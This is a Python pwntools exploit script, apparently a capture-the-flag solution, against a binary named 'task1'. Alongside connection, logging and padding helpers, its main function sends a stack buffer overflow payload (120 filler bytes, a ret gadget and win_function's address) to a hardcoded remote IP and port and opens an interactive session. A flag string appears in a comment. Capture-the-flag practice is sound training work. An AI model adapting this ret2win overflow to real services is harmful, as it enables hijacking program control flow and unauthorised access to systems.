#!/usr/bin/env python
from pwn import *
from time import sleep
exe = ELF("./task1")
context.binary = exe

# Connection handles; both are filled in by conn().
sshc = r = None

# Remote target as an "nc host port" string, and the SSH connection details.
# The SSH tuple holds placeholders only; keep real credentials out of version
# control (read them from the environment instead).
nc = "nc 34.155.40.100 1234"
ssh_conn = ('HOST', 22, 'USER', 'PASS', 'BIN_NAME')

# Seconds to wait before every send()/sendl(); 0 disables the throttle.
SLEEP_TIME = 0
# Communication ----------------------------------------------------------
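def tobytes(x):
    """Return *x* unchanged if it is already ``bytes``, else ``str(x).encode()``.

    Written as a ``def`` rather than a named lambda (PEP 8 E731) so the
    function has a proper name in tracebacks.
    """
    if isinstance(x, bytes):
        return x
    return str(x).encode()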
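def readl():
    """Read one line from the current connection ``r`` (set by conn()).

    A ``def`` instead of a named lambda (PEP 8 E731) so the name shows up
    in tracebacks.
    """
    return r.readline()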
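def recvuntil(x):
    """Receive from ``r`` until the delimiter *x* (str or bytes) is seen.

    A ``def`` instead of a named lambda (PEP 8 E731) so the name shows up
    in tracebacks.
    """
    return r.recvuntil(tobytes(x))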
def sendl(x):
    """Send *x* (str or bytes) to ``r`` followed by a newline.

    Pauses SLEEP_TIME seconds first, so a non-zero SLEEP_TIME throttles
    every send.
    """
    sleep(SLEEP_TIME)
    data = tobytes(x)
    r.sendline(data)
def send(x):
    """Send *x* (str or bytes) to ``r`` without a trailing newline.

    Like sendl(), pauses SLEEP_TIME seconds before sending.
    """
    sleep(SLEEP_TIME)
    raw = tobytes(x)
    r.send(raw)
# Logging ----------------------------------------------------------------
def log(msg, value, length=25):
    """Print ``msg`` padded to *length* columns, then ``: value``.

    The padding is ``length - len(msg)`` spaces, which collapses to nothing
    when *msg* is longer than *length*.
    """
    padding = ' ' * (length - len(msg))
    print(msg, padding, ':', value)
def logh(msg, value):
    """Like log(), but renders the integer *value* as hex (``0x...``)."""
    log(msg, value=hex(value))
# Helpers ----------------------------------------------------------------
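def padPayload(s, size=70, used=0, extra=0):
    """Return the ``b'A'`` filler that brings payload *s* up to *size* bytes.

    The filler length is ``size - len(s) - 8*used - extra``: *used* is a
    count of 8-byte units to subtract and *extra* is any further bytes
    to subtract.

    Raises ValueError (instead of the original ``assert``, which is
    stripped under ``python -O``) when *s* already reaches *size*, or when
    the deductions would make the filler length negative -- the original
    silently returned ``b''`` in that case, which hides a sizing mistake.
    """
    if len(s) >= size:
        raise ValueError("Payload length bigger than size! (" + str(size) + ")")
    pad_len = size - len(s) - 8 * used - extra
    if pad_len < 0:
        raise ValueError(
            "Padding would be negative (size=%d, len=%d, used=%d, extra=%d)"
            % (size, len(s), used, extra)
        )
    return b'A' * pad_len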
def conn():
    """Open the target connection, store it in the global ``r`` and return it.

    Selection is driven by pwntools ``args``: LOCAL runs the binary at
    ``exe.path``, SSH connects with the ``ssh_conn`` details (keeping the
    session in the global ``sshc``), otherwise the ``nc`` string is split
    into host and port for a plain TCP connection.
    """
    global r, nc, ssh_conn, sshc
    if args.LOCAL:
        r = process([exe.path])
        return r
    if args.SSH:
        # Tuple layout follows ssh_conn: (HOST, port, USER, PASS, BIN_NAME).
        host, port, user, password, binary = ssh_conn
        sshc = ssh(user, host, port, password)
        r = sshc.process([binary])
        return r
    target = nc.replace('nc ', '').split(' ')
    r = remote(target[0], int(target[1]))
    return r
def main():
    """Connect, send the overflow payload and hand the session to the user."""
    global r
    r = conn()
    # Named `ret` in the original; presumably a lone `ret` gadget placed before
    # win_function's address -- confirm against the binary.
    ret = 0x000000000040101a
    filler = b"a" * 120
    payload = filler + p64(ret) + p64(exe.symbols.win_function)
    r.sendline(payload)
    r.interactive()  # FLAG{buffer_overflows_never_gets_old}
if __name__ == "__main__":
    # Only run when executed directly, not when imported as a helper module.
    main()